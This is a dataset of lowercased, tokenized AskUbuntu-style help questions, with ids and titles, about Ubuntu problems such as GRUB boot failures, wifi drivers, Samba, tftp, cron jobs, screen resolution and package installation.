457047	how can i get the ( xdg ) default user directories from python ?	by example , in english the default user folders will be : $ home/desktop ... . $ home/videos in spanish the default user folders will be : $ home/escritorio ... . $ home/vă­deos the file ~/.config/user-dirs.dirs has those localize names for the default folders . ( always ? ) . i need to get those names from a python script . i 'd like not to parse that file . is there other elegant way ? i found this : from xdg.basedirectory import * print xdg_cache_home print xdg_config_dirs print xdg_config_home print xdg_data_dirs print xdg_data_home but it does n't return those folders . thanks in advance !
457049	how do i add a windows 8 user to linux standalone samba server	i would like to add a windows 8 ( microsoft account ) user to a samba user on standalone ( not domain ) linux server , however i do not know how the microsoft account maps to linux . i have also setup the samba shares based on group access . i have guests enabled in samba so when my windows 8 workstation connected for the first time it did not recognise the user and connected to samba as a guest with nobody as user . now when i connect to the shares it always connects as guest ( that is nobody user on samba ) . i would like the guest users to still be allowed to connect as read only . is there anyway to force windows 8 to prompt for login again ? note that my shares are not mapped in explorer they are browsable .
457061	ralink 148f:7601 wifi adaptor installation	i am trying to install ralink wifi adaptor to my desktop ubuntu 14.04 the system is not detecting the wifi . lsusb lists the device as : bus 002 device 004 : id 148f:7601 ralink technology , corp . i have rt2800 usb driver listed in /etc/modules follwing some instructions on web , i tried this command : echo 148f 7601 | sudo tee /sys/bus/usb/drivers/rt2800usb/new_i lsmod | grep rt2800 'command returns the following : ' rt2800usb 26581 0 rt2x00usb 20041 1 rt2800usb rt2800lib 83150 1 rt2800usb rt2x00lib 48886 3 rt2x00usb , rt2800lib , rt2800usb mac80211 545990 3 rt2x00lib , rt2x00usb , rt2800lib crc_ccitt 12627 1 rt2800lib pls help me get the wifi adaptor up nad running ... ... .thanks .
457062	can not print pdf to printer using document viewer in ubuntu 12.04	i have been printing pdf documents using document viewer for several years . recently , there was a series of updates from ubuntu and now i can no longer print pdf documents . i have two wireless hp printers . when the print job is sent , they set in the print que . i can use ocular , and other programs , but can not use the default pdf viewer , `` document viewer '' to print a pdf .
457065	ca n't boot to windows 8.1 after installing 14.04	i 've just installed ubuntu 14.04 on my new computer . i had previously installed 13.04 and 13.10 without problems on my old computer , but it seems that i 've done something wrong now . the problem is that it directly boots to ubuntu , it does n't even show up grub . my mobo is an asus h87-pro . i think i have to disable something but i do n't know why . here 's my boot-repair log : http : //paste.ubuntu.com/7352785/ thanks in advance
457066	could n't install make	i try to install make on ubuntu 12.04 lts server apt-get install make but i observe error : temporary failure resolving 'de.archive.ubuntu.com failed to fetch http : //de.archive.ubuntu.com/ubuntu/pool/main/m/make-dfsg/make_3.81-8.1ubuntu1.1_i386.deb could you describe me what happened ?
457067	difficulty transferring file to android phone	when i first connect my android phone , it gives me the open to open a folder , but i closed it and how i ca n't find it . disconnecting and reconnecting my phone does n't give me the a chance to open the folder . elsewhere on askubuntu i learned about lsusb $ sudo lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 5986:0292 acer , inc bus 002 device 034 : id 1004:631e lg electronics , inc . bus 002 device 003 : id 1c7a:0603 lightuning technology inc . bus 002 device 004 : id 0bda:0139 realtek semiconductor corp. card reader dmesg | tail gives stuff like this : [ 87199.613713 ] usb 2-1.2 : product : lge android phone [ 87199.613718 ] usb 2-1.2 : manufacturer : lg electronics inc. [ 87199.613722 ] usb 2-1.2 : serialnumber : lg-lg870-47ff109 [ 87338.250539 ] ieee80211 phy0 : start : tid 1 is not agg'able [ 87473.650192 ] ieee80211 phy0 : brcms_c_ampdu_dotxstatus_complete : pkt tx suppressed , illegal channel possibly 5 could this be the reason i can no longer transfer files to my phone ?
457070	nexus 10 problem restoring android	new nexus 10 . tried ubuntu-touch over the weekend and now trying to restore android , but it appears to be hanging at the `` sending 'system ' '' stage . what am i doing wrong ? here is the dump : xxx @ yyyyy : ~/downloads/mantaray-jdq39 $ ./flash-all.sh erasing 'boot ' ... okay [ 0.028s ] finished . total time : 0.028s ******** did you mean to fastboot format this partition ? erasing 'cache ' ... okay [ 0.098s ] finished . total time : 0.098s erasing 'recovery ' ... okay [ 0.027s ] finished . total time : 0.027s ******** did you mean to fastboot format this partition ? erasing 'system ' ... okay [ 0.148s ] finished . total time : 0.148s ******** did you mean to fastboot format this partition ? erasing 'userdata ' ... okay [ 0.537s ] finished . total time : 0.537s sending 'bootloader ' ( 1280 kb ) ... okay [ 0.181s ] writing 'bootloader ' ... okay [ 0.147s ] finished . total time : 0.328s rebooting into bootloader ... okay [ 0.001s ] finished . total time : 0.001s archive does not contain 'boot.sig' archive does not contain 'recovery.sig' archive does not contain 'system.sig' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- bootloader version ... : mantalj12 baseband version ... .. : no modem serial number ... ... .. : r32d800dg9n -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- checking product ... okay [ 0.001s ] checking version-bootloader ... okay [ 0.001s ] sending 'boot ' ( 4608 kb ) ... okay [ 0.618s ] writing 'boot ' ... okay [ 0.116s ] sending 'recovery ' ( 5108 kb ) ... okay [ 0.688s ] writing 'recovery ' ... okay [ 0.120s ] erasing 'system ' ... okay [ 0.149s ] sending 'system ' ( 522703 kb ) ...
457075	ubuntu 14.04 jumps to grub every time !	there are two operating systems in my laptop , windows xp and ubuntu 14.04 . every time when i reboot the laptop , it will jump to grub 2.02 . i can type these following commands e.g : set root= ( hd0,7 ) textchainloader +1 boot ... and it will boot ubuntu successfully . but i do n't want to do it every time . i have searched the internet for solutions , but none of them can help . what should i do ? many thanks . i am waiting for your answer .
457077	usb-3-drive suddenly unstable when connected to usb-3-port ( maxpower issue ? )	i have a usb-3 external hdd that worked always fine . all of a sudden the drive began to `` umount '' randomly . after checking the hdd for badblocks and testing the cable without any result , i decided to try the drive on one of my usb-2 ports . here , everything worked fine . after doing some further checking ( dmesg , etc . ) i think i found the root of the problem , but i do n't know how to solve it . if plugged at any usb-2 port lsusb reports `` maxpower 500ma '' and the according file under /sys/../bmaxpower also shows `` 500ma '' . if plugged at one of the usb-3 ports lsusb reports `` maxpower 224ma '' ( this might be a problematic figure given the specs of the hdd , but i 'm no electrotechnician to judge this ) while the according file under /sys/../bmaxpower reports `` 896ma '' . ( note : bconfigurationvalue is the same on both ports . ) i hope there is anybody who might either tell me that the discrepencyies between the figures are `` ok '' and/or tell me where this problem might come from and how i might be able to fix it . as mentioned before : the drive worked before without any problems ( even under 14.04 ) . thanks in advance for any help or hint .
457079	maas server can not power on enlisting nodes	i follow the latest document to setup node but stuck on nodes can not power on after pressed commissioning . maas controller/nodes os : ubuntu 14.04 x86_64 bios : enable wake-on-lan option for all nic ( 2 onboard and an intel quad port nic ) do i miss something to enable wol function ? thanks
457080	magnet link sometimes does not open transmission	after doing a fresh install of ubuntu 14.04 , magnet links sometimes do not open transmission , its my only torrent client and i need to restart mt computer to get it working . how can i fix this ? im using chrome
457081	how can i use a verbatim secure'n'go usb key ?	i have purchased a 4gb usb key from verbatim . how can i use it under ubuntu ? i do not need the `` secure data '' feature , and have still not saved anything on it , so formatting at low level would be ok . however , i was not able to do it , although i tried several things . some details : the key comes with a windows-only application which ( under windows ) forces you to set a ( non empty ) password before the first use . then , every time you insert the key , it asks for the password to grant access . the key actually has two partitions , the smaller one ( 41mb ) containing the auto-executable software and doc , and the bigger one ( the actual storage space ) being initially empty . in ubuntu , i can only see the small partition with ls or a file manager . however , `` ls -l /dev/disk/by-id/*usb* '' outputs : /dev/disk/by-id/usb-verbatim_secure_data_usb_070007013aa6edb2de98-0:0 - > ../../sdb /dev/disk/by-id/usb-verbatim_secure_data_usb_070007013aa6edb2de98-0:1 - > ../../sr1 surprisingly , `` sudo mkfs.vfat -f 32 /dev/sdb '' says : /dev/sdb : no medium found and `` sudo mkfs.vfat -f 32 /dev/sr1 '' says : mkfs.vfat : unable to open /dev/sr1 : read-only file system indeed , /dev/sr1 is marked brw-rw -- -- + 1 root cdrom 11 ... which could explain why the system is read-only ! finally , i do not see any of the two partitions in gparted or with `` sudo fdisk -l '' thanks for your help ! bernoot
457088	use xclip in a launcher command on xfce4 panel ?	i 'm trying to get this command line to work in a launcher on xfce4 : echo `` myadress '' | xclip -selection clipboard if i use this command line in the standard terminal , there are no problems . executed from the launcher nothing happens . edit : a workaround is to create a bash script with the command line above and add the path to the script in the command field from the launcher .
457089	multi-user text mode runlevel in ubuntu	i use ubuntu as a server , and i want to change its runlevel to be full multi-user text mode ( like init 3 in redhat ) . from this command runlevel i see that am running n 2 which is graphical multi-user with networking based on this http : //en.wikipedia.org/wiki/runlevel so i 'm wondering , is `` 1- single-user mode '' in ubuntu the equivalent for `` 3- full multi-user text mode '' in redhat ?
457093	restart firefox with a cronjob	i have a ubuntu 14.04 system that just runs firefox all day . now i want to restart firefox automatically once a day , so i created the following shell script : # ! /bin/sh killall firefox sleep 5 killall -9 firefox sleep 2 /usr/bin/firefox -url < ... > and set up da cronjob to call the script . but it does n't work , i get : error : no display specified when i insert export display=:0 i get no protocol specified no protocol specified error : can not open display : :0 what 's the correct way to do it ?
457094	tftpd-hpa server ( timeout from client side ) please help	i 'm a bit new to version 14.04 of ubuntu : no lsb modules are available . i am trying to set up a tftp server , mostly for backup up cisco ios configs . i have followed every tutorial i can , and i 'm getting nowhere . the problem seems to be a timeout , waiting for the write request from the client side : before i try to transfer : ps -aux | grep tftp root 7804 0.0 0.0 15128 160 ? ss 10:48 0:00 /usr/sbin/in.tftpd -- listen -- user tftp -- address 0.0.0.0:69 -- secure -c -vv -i /var/lib/tftpboot after i use my windows 7 tftp client to send a put request : jarrod @ dangerfield : ~ $ ps -aux | grep tftp root 7804 0.0 0.0 15128 160 ? ss 10:48 0:00 /usr/sbin/in.tftpd -- listen -- user tftp -- address 0.0.0.0:69 -- secure -c -vv -i /var/lib/tftpboot tftp 8819 0.0 0.0 15132 632 ? s 11:04 0:00 /usr/sbin/in.tftpd -- listen -- user tftp -- address 0.0.0.0:69 -- secure -c -vv -i /var/lib/tftpboot you can see it open the second connection and then it just times out . it then creates an empty file : -rw-rw-rw- 1 tftp tftp 0 apr 28 11:04 acousticlist.txt in directory : drwxrwxrwx 2 tftp tftp 4096 apr 28 11:04 tftpboot these are my defaults : : /etc/default $ more tftpd-hpa # /etc/default/tftpd-hpa # run_daemon= '' yes '' tftp_username= '' tftp '' tftp_directory= '' /var/lib/tftpboot '' tftp_address= '' 0.0.0.0:69 '' tftp_options= '' -- secure -c -vv -i '' i have the -c for create files , secure for the one directory , -vv for verbose logging . i found the i option on one of the help files . adding that did not help nor hurt . it always does the same thing . ufw is disabled . /etc/default $ sudo service ufw status ufw stop/waiting i ca n't see anything else that would be stopping this . i kill -9 the root and tftp user processes . the root process starts again listening immediately . the tftp user process only starts when you initiate the tftp transfer . this is just using upstart . i have tried running it in stand alone with the same result . in.tftpd [ 8897 ] : wrq from 192.168.0.6 filename acousticlist.txt i have tried running wireshark and sudo tcpdump -vvv -i eth0 | grep tftp i 'm not really getting any further than the write request is coming in , then there is a timeout on the client end . if anyone could help me , i would really appreciate it as i am at a dead end .
457095	the upgrade has aborted . your system could be in an unusable state	when the stable version of ubuntu 14.04 was released i tried to to upgrade without any results , so i did : sudo update-manager -d but when i was upgrading the files i went off without electricity and my laptop did n't have the battery . ok , i could fix it with an earlier state of ubuntu , but now i 'm having problems in the option `` software updater '' , for switching from developers version to stable version . when i click in software updater it says it can run only `` partial upgrade '' . see image : then i run a partial upgrade and just nothing happens . see this one : well , i reported the bug but i 'm looking for a solution . then i tried again sudo update-manager -d and this was the result : **could not install the upgrades** the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . '' the output from shell is : [ 000:000 ] cpu : 6.42.7 , x2 , 1600mhz , 7686mb [ 000:000 ] computer model : not available [ 000:000 ] browser xembed support present : 1 [ 000:000 ] browser toolkit is gtk2 . [ 000:000 ] using gtk2 toolkit [ 000:002 ] warning ( optionsfile.cc:47 ) : load : could not open file , err=2 [ 000:002 ] no bp log location saved , using default . [ 000:003 ] cpu : 6.42.7 , x2 , 1600mhz , 7686mb [ 000:003 ] computer model : not available [ 000:003 ] browser xembed support present : 1 [ 000:003 ] browser toolkit is gtk2 . [ 000:003 ] using gtk2 toolkit no bp log location saved , using default . [ 000:000 ] cpu : 6.42.7 , x2 , 1600mhz , 7686mb [ 000:000 ] computer model : not available [ 000:013 ] warning ( optionsfile.cc:47 ) : load : could not open file , err=2 [ 000:013 ] no bp log location saved , using default . [ 000:014 ] cpu : 6.42.7 , x2 , 1600mhz , 7686mb [ 000:014 ] computer model : not available any idea ?
457096	/etc/passwd file is corrupt and i can not change it i also can not login as root	i have attempted to change the file /etc/passwd in ubuntu server 12.04 and i tried to change the root username . i only changed one part of the root username this is what i have : main : x:0:0 : root : /root : /bin/bash daemon : x:1:1 : daemon : /usr/sbin : /bin/sh bin : x:2:2 : bin : /bin : /bin/sh sys : x:3:3 : sys : /dev : /bin/sh sync : x:4:65534 : sync : /bin : /bin/sync games : x:5:60 : games : /usr/games : /bin/sh man : x:6:12 : man : /var/cache/man : /bin/sh lp : x:7:7 : lp : /var/spool/lpd : /bin/sh mail : x:8:8 : mail : /var/mail : /bin/sh news : x:9:9 : news : /var/spool/news : /bin/sh uucp : x:10:10 : uucp : /var/spool/uucp : /bin/sh proxy : x:13:13 : proxy : /bin : /bin/sh www-data : x:33:33 : www-data : /var/www : /bin/sh backup : x:34:34 : backup : /var/backups : /bin/sh list : x:38:38 : mailing list manager : /var/list : /bin/sh irc : x:39:39 : ircd : /var/run/ircd : /bin/sh gnats : x:41:41 : gnats bug-reporting system ( admin ) : /var/lib/gnats : /bin/sh nobody : x:65534:65534 : nobody : /nonexistent : /bin/sh libuuid : x:100:101 : :/var/lib/libuuid : /bin/sh [ read 53 lines ( warning : no write permission ) ] the top line where it says main needs to say root . i can not change this file because no other user has sudo access . this is a server hosted by another company so i can not access recovery mode or the live boot disc . thanks , bryce pruett
457101	error when formatting hadoop java_home is not set	i get the fallowing msj when i try to format my cluster re-format filesystem in /app/hadoop/tmp/dfs/name ? ( y or n ) y 14/04/28 10:20:16 info util.gset : vm type = 64-bit 14/04/28 10:20:16 info util.gset : 2 % max memory = 19.33375 mb 14/04/28 10:20:16 info util.gset : capacity = 2^21 = 2097152 entries 14/04/28 10:20:16 info util.gset : recommended=2097152 , actual=2097152 14/04/28 10:20:17 info namenode.fsnamesystem : fsowner=ricardo 14/04/28 10:20:17 info namenode.fsnamesystem : supergroup=supergroup 14/04/28 10:20:17 info namenode.fsnamesystem : ispermissionenabled=true 14/04/28 10:20:17 info namenode.fsnamesystem : dfs.block.invalidate.limit=100 14/04/28 10:20:17 info namenode.fsnamesystem : isaccesstokenenabled=false accesskeyupdateinterval=0 min ( s ) , accesstokenlifetime=0 min ( s ) 14/04/28 10:20:17 info namenode.namenode : caching file names occuring more than 10 times 14/04/28 10:20:17 error namenode.namenode : java.io.ioexception : can not remove current directory : /app/hadoop/tmp/dfs/name/current at org.apache.hadoop.hdfs.server.common.storage $ storagedirectory.cleardirectory ( storage.java:292 ) at org.apache.hadoop.hdfs.server.namenode.fsimage.format ( fsimage.java:1326 ) at org.apache.hadoop.hdfs.server.namenode.fsimage.format ( fsimage.java:1345 ) at org.apache.hadoop.hdfs.server.namenode.namenode.format ( namenode.java:1207 ) at org.apache.hadoop.hdfs.server.namenode.namenode.createnamenode ( namenode.java:1398 ) at org.apache.hadoop.hdfs.server.namenode.namenode.main ( namenode.java:1419 ) 14/04/28 10:20:17 info namenode.namenode : shutdown_msg : /************************************************************ shutdown_msg : shutting down namenode at ricardo-virtualbox/127.0.1.1 ************************************************************/ can anyone help with these error messages error namenode.namenode : java.io.ioexception : can not remove current directory : /app/hadoop/tmp/dfs/name/current i try runinng this : sudo su and bin/hadoop namenode -format and i get this : error : java_home is not set .
457104	hp laserjet 2100 printer does n't print in ubuntu 14.04	i have an hp laserjet 2100 printer . after having upgraded to ubuntu 14.04 i used localhost , but with the given configuration i can not print the test page . in certain cases the red signal lamp on the printer turns on and i have to cancel the print job . with hplip i do not have the possibility to put lpt1 and i stop there . also when i setup the printer in the administration interface i can not print . it exits with a error warning and the pdf blocks my printer . but i am hoping for your kind assistance .
457108	how can i run a command automatically upon usb diconnect ?	i am running ubuntu 12.04 from a flash drive , and am in a situation where the usb drive it is running from ( along with other usb devices ) can be disconnected very easily ( wonky/bent ports ) . what would be the easiest way to run a command ( in this case , a script that terminates running servers and sounds an alarm ) when any usb device , including the drive it is running from , disconnects ? thanks !
457109	php memcache extension incomplete on ubuntu 12.04	the issue is this . i have several servers all running the php5-memcache extension on ubuntu 12.04 . the php documentation ( on php.net ) has several functions like cas that are not part of the default php5-extension on 12.04 . the class doe have get , put , add , delete and i think extendedstats or something like that . while i have n't tried every other method of the class listed at php.net all of the other methods i have tried fail . i assume this is because ubuntu is using an old or modified version of the memcache class for 12.04 . so how do i fix that ? does anyone know if this is `` fixed '' in 14.04 ?
457112	how does the javascript webapp integration work ?	so , this question is mostly for the guys at canonical that came up with the javascript integration of ( i think it 's c++ , but i could be wrong ) integration . how is it possible to integrate external api 's into browsers ' idl . i am looking forward to developing something simillar , but i have no clue on how to start . i 've read about window.external , npapi , ppapi and it just does n't seem like what they had used .
457119	change default selection when searching in dash	when i hit the [ super ] key , or hit on the ubuntu button to open up the dash , is there a way i can change the default `` what to search '' option to appplications , instead of home ( computer and online sources ) . i know alt+f2 will do the trick , but i still want to have all the other options open in case i want to search for a file , and still it is easier to open dash with a click or the hit of one key , rather than a combination . i 'm using ubuntu 14.04
457123	fixing grub after removing linux	i had installed ubuntu on a friend 's computer . it had two drives - c and d , so i took d ( which did n't include the system ) and reformatted it with ubuntu . after a week he has asked me to remove it . so in windows , i used the partition manager to reformat the ubuntu partition as a ntfs drive for windows . i then forgot about grub , and sometime later , after a restart , my friend was stuck with grub rescue . i do not have any windows cd at hand ... what 's the best way to fix this ? ( i 've found many suggestions , but most of them fix it through ubuntu , which in this case is n't relevant because i removed ubuntu ) . thoughts ?
457127	error with texlive-publishers-doc . can not install it	i use ubuntu 14.04 and i install texlive-full from the repositories . it went all fine until the installation stopped with this error : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/t/texlive-extra/texlive-publishers-doc_2013.20140215-2_all.deb size mismatch so i can not install texlive-publishers where there are some packages i need to use to compile my work with latex . any guess ? ?
457128	remapping keyboard	what i 'm wondering about is whether there is a way to remap keys using ubuntu in the same way that i use `` sharpkeys '' or `` keytweak '' which supposedly only work with windows . if so , would it work with zorin or which linux version would it work with if it matters ? secondly , forgetting remapping now . if i install zorin on a thinkpad that has the rare browser forward/back keys would they work ? worried that since no other manufacturer uses these keys the zorin software would not recognize them . having trouble installing zorin at the moment on my old thinkpads for some reason using usb so ca n't discover this for myself but that 's a subject for another day . need to make a laptop purchase now or keep renovating the old and want to abandon windows without surrendering my beloved browser keys , somehow . much research so far has revealed no answer . thank you
457129	how to upgrade ubuntu 14.04 using usb bootable drive	currently i am using ubuntu 12.10 . and i want to upgrade to 14.04 . can i upgrade it using an usb bootable drive without formatting the old os ?
457130	open several vim-encrypted files with the same password	let 's say i have three files in the same folder , a.txt , b.txt and c.txt , all of them encrypted ( with vim ) with the same password ( `` asdf '' for example ) . is there a way to open the three of them entering the password only once ? thanks .
457132	manually installung grub2 after windows8.1 update 1	after boot-repair failed to install ( both with secure boot disabled and enabled ) , i decided to try running grub-install manually using the following command . sudo grub-install -- root-directory=/mnt/root/ -- efi-directory=/boot -- uefi-secure-boot /dev/sda7 where /dev/sda7 is the root for the ubuntu install . however , this prints installing for i386-pc platform. , and i 'm on a 64 bit machine . it fails , saying : grub-install : warning : file system `ext2 ' does n't support embedding . grub-install : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged . grub install : error : will not proceed with blocklists . i tried adding -- target=x86_64-efi , but that prompted grub-install : error : /usr/lib/grub/x86_64-efi/modinfo.sh does n't exist . please specify -- target or -- directory . an ls showed that , indeed , this file did n't exist . ubuntu @ ubuntu : / $ ls /usr/lib/grub grub-mkconfig_lib i386-pc i do n't really know what to do now . i 'm currently running ubuntu 14.04 on a live usb . the machine is a toshiba sattellite p55t with an i5 .
457134	can ndiswrapper work with rtl8723ae ?	i have ubuntu 64 bit version installed next to windows 7.can i use windows 7 rtl8723ae driver with ndiswrapper ? ? ?
457135	user login screen is not asking for password	my laptop is no longer requiring a password for my account from the user-login screen . no matter what settings i change , it never asks me for a password unless i am unlocking the screen from a locked session . changing the automatic login requirement in the system settings/user area no longer works .
457142	how to install skype on ubuntu 12.04 64bit	i tried sudo apt-get install skype and it shows unable to locate package skype how should i install it ?
457144	find files in a directory and list them	i 'm in a directory containing several sites directories . all these sites have a logs/ directory . i wish to find and list the files under each logs/ directory with the -ls parameter .
457145	why is program not executed even though it is in my path ?	i am trying to run a program in /usr/local/bin/ called runserver . /usr/local/bin is in $ path ... echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games i am referencing the right program ... which runserver /usr/local/bin/runserver yet when i try to execute runserver i get error that bash is trying to execute runserver in /usr/bin runserver bash : /usr/bin/runserver : no such file or directory what am i missing ?
457150	can i upgrade ubuntu 14.04 lts 64 bit from 13.10 32 bit	currently i am using ubuntu 13.10 32 bit version . can i upgrade it to ubuntu 14.04 64 bit version ?
457151	clicking on the sound settings text under the sound indicator takes me to the all settings panel	i just upgraded to 14.04 and my sound has been missing since then . i tried checking the sound settings by clicking on the sound settings icon and `` sound settings.. '' text below it but instead of taking me to the sound panel it takes me to the all settings panel ? how do i fix this . i also tested the sound and there is no sound so the sound is also not working thanks
457152	where is prozilla download manager ? who is its developer ?	http : //sourceforge.net/projects/prozilla = > no download link ftp : //ftp.tu-clausthal.de/pub/mirror/gnu/www/directory/prozilla.html = > : ( i found this ppa : tahutek-team/prozilla , but it does not support ubuntu trusty ! ( i do n't know is it provided by the original team or not ? ) is prozilla an in progress software ? i mean is it still in development ? where is its source/binary package ? however , is this app available for ubuntu 14.04 ?
457153	dual-boot xubuntu & windows 8 on asus zenbook ux32a	i just got an asus zenbook ux32a . it 's got a 24gb ssd and a 500gb hdd . i 'm trying with little success to run a dual-boot with xubuntu but i honestly have no idea how to do this and everything i 've found online is so confusing . i already have a live disk but not a clue where to install or it or what to resize etc etc . could someone help me please ? thanks
457155	compress and extract options in thunar	please anyone help me in creating custom options for compress and extract here in thunar file manager please help me ...
457156	graphics unknown	i am using ubuntu 12.04 with a nvidia gt 620 graphics card . i installed the graphics drivers and it seams to work , however when i check the graphics section in system details it says : driver unknown experience standerd also i do n't get a splash screen on boot ( not that it 's a big deal , but a little bit annoying . ) other then that everything seams to be working just fine , i am able to open the nvidia x server settings and adjust settings that take effect . i 'm a little confused about what the problem actually is , all help is vary welcome . thanks !
457158	disabling the display of mounted partitions on unity launcher	on ubuntu 12.04.3 lts 32-bit is it possible to disable the displayed shortcut to mounted partitions . i have included a partition that was not present at the installation time in the /etc/fstab file and now the disk image is continuously displayed on the unity launcher , the system should not display it in my opinion . is there any way to disable it ?
457159	node.js app runs from command line but gives errors when run from cron job on reboot on ubuntu 14.04 lts	when starting my app manually using forever , it works fine . it runs on localhost:8080 and nginx does the routing . when using a cronjob my starter.sh script runs but in the forever log i get an error . if i run the starter.sh script from the command line my app also works . it only does not work when run from a cronjob . here are the details : forever list command output : data : [ 0 ] pqhz /root/.nvm/v0.10.26/bin/node server.js 953 1077 /root/.forever/pqhz.log 0:0:0:7.90 starter.sh bash script that runs on reboot : # ! /bin/sh if [ $ ( ps -e -o uid , cmd | grep $ uid | grep node | grep -v grep | wc -l | tr -s `` \n '' ) -eq 0 ] then export path=/root/.nvm/v0.10.26/bin/ : $ path forever start -- spinsleeptime 10000 -- sourcedir /root/neet server.js > > /root/cronlog.txt 2 > & 1 fi crontab -e : @ reboot sh /root/neet/starter.sh starter.sh output : ^ [ [ 33mwarn^ [ [ 39m : -- minuptime not set . defaulting to : 1000ms ^ [ [ 32minfo^ [ [ 39m : forever processing file : ^ [ [ 90mserver.js^ [ [ 39m forever error log : error : enoent , no such file or directory './client/index.html' at object.fs.opensync ( fs.js:427:18 ) at object.fs.readfilesync ( fs.js:284:15 ) at self.populatecache ( /root/neet/server.js:42:40 ) at self.initialize ( /root/neet/server.js:174:14 ) at object. < anonymous > ( /root/neet/server.js:191:6 ) at module._compile ( module.js:456:26 ) at object.module._extensions..js ( module.js:474:10 ) at module.load ( module.js:356:32 ) at function.module._load ( module.js:312:12 ) at function.module.runmain ( module.js:497:10 ) error : forever detected script exited with code : 8 error : script restart attempt # 1 this is the line of code in my app that the error references : self.zcache [ 'index.html ' ] = fs.readfilesync ( './client/index.html ' ) ; i 'm really stumped as to why it ca n't read the file only when running from a cronjob on reboot . some help would be very much appreciated .
457164	unity broken after upgrade to 13.10	i have upgraded from 13.04 to 13.10 using the system updater an now unity is broken . it looks like a display problem . the icons and the title bar are all messed up and when i try to open the dash the dash window is unintelligible , looks like a television set on a dead channel . i have to say that the upgrade failed while trying to copy libwekitgtk . i solved that downloading the library manually and that looks ok now . i have already tried many apt-get update , upgrades , reinstalling unity and . i always get messages that my system is fully updated . it does n't look like a missing package problem . update : if i try doing unity -- replace from a shell i get a bunch of these messages : radeon : the kernel rejected cs , see dmesg for more information thanks for the help . giulio
457165	dual booting windows 8.1 and ubuntu 14.04 with uefi on a system that is n't preinstalled ?	i 'm interested in dual booting ubuntu 14.04 alongside my copy of windows 8.1 . the copy of windows 8.1 is not preinstalled , as i built the pc my self , and it is a retail stock version of windows 8.1 . could someone please help me with this ?
457166	how to follow a link in man	when looking at man-pages in the terminal i often come across words with bracketed numbers after them ( like mkdir ( 2 ) ) . if i am not mistaken , these are links or references to other man-pages . if so , how can i follow that link / find the referenced page ? if not , what does this mean ?
457169	increase laptop screen resolution over 1024x768 on hp compaq presario v3000	just installed ubuntu 12.04 . the default display driver has fixed my resolution to 1024x768 . the only other option i see for selection is 800x600 . is there a way to increase my resolution to see 1280x800 as many sites recommend ? my desktop is not using the full screen . it 's sticking to the left side . have about 4 inches of dark unused area to my right . have been trying to configure this since 3 days . no progress made so far : - ( as per some of the suggestions in the comments , i tried the following steps . step 1 : cvt 1280 800 output : # 1280x800 59.81 hz ( cvt 1.02ma ) hsync : 49.70 khz ; pclk : 83.50 mhzmodeline `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync step 2 : xrandr -- newmode `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync step 3 : xrandr -- verbose -- addmode lvds1 1280x800_60.0 output : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 149 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 27 current serial number in output stream : 28 is this due to refresh rate ? my xrandr gives the following output now : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 lvds1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) tv1 disconnected ( normal left inverted right x axis y axis ) 1280x800_60.00 ( 0xd5 ) 83.5mhz h : width 1280 start 1352 end 1480 total 1680 skew 0 clock 49.7khz v : height 800 start 803 end 809 total 831 clock 59.8hz
457171	what are the differences between gnome , gnome-shell and gnome-core ?	i am running ubuntu gnome and apt says that i have gnome-shell installed , but not gnome or gnome-core . $ apt-cache policy gnome gnome : installed : ( none ) candidate : 1:3.8+4ubuntu3 version table : 1:3.8+4ubuntu3 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/universe i386 packages $ apt-cache policy gnome-shell gnome-shell : installed : 3.10.4-0ubuntu5 candidate : 3.10.4-0ubuntu5 version table : *** 3.10.4-0ubuntu5 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/universe i386 packages 100 /var/lib/dpkg/status $ apt-cache policy gnome-core gnome-core : installed : ( none ) candidate : 1:3.8+4ubuntu3 version table : 1:3.8+4ubuntu3 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/universe i386 packages why does apt say i have not installed gnome , although i 'm using gnome as the desktop environment ?
457174	difference between sources.list and sources.list.distupgrade	on ubuntu , in the /etc/apt/ , there are two files : sources.list and sources.list.distupgrade . but i only know they are used to update system . however , what are the the difference between them ? by the way , what the gpg keys used for ? when i update the sources.list using ubuntu source list generator , should i update gpg keys as well ? thanks !
457175	how to remove element from gsettings array in script ?	array in dbus/gsettings has a format [ element1 , element2 , element3 , ... ] . gsettings ' interface allows only replacing existing array with another , so for instance , adding another item element can be achieved as follows : # ! /bin/bash gsettings get $ { schema } $ { key } | grep -q \ '' $ { value } \ '' > /dev/null if [ $ ? -ne 0 ] ; then gsettings set $ { schema } $ { key } \ '' `gsettings get $ { schema } $ { key } | sed s/. $ //` , $ { value } ] \ '' fi can anyone help me with a script , that checks whether at least one element exists that matches the regex , and if it does , it parses the gsettingsarray string , and removes all matching elements ( and puts it back withgsettings set` , but that is trivial ) . i tried to find such tool , but i failed to find one . i can not believe , that nobody yet had a need for such tool ... the question complements how to add element to the gsettings array at the specific location ( given by index ) ?
457178	games for windows live marketplace alternative for ubuntu 14.04 ( or win7 )	does anyone know a good games for windows live marketplace alternative for ubuntu 14.04 ? i have one game ( tron evolution ) , wich doesn ' t work completly without games for windows live marketplace . it 's the software which save the game . without it , the games is just an expensive demo .
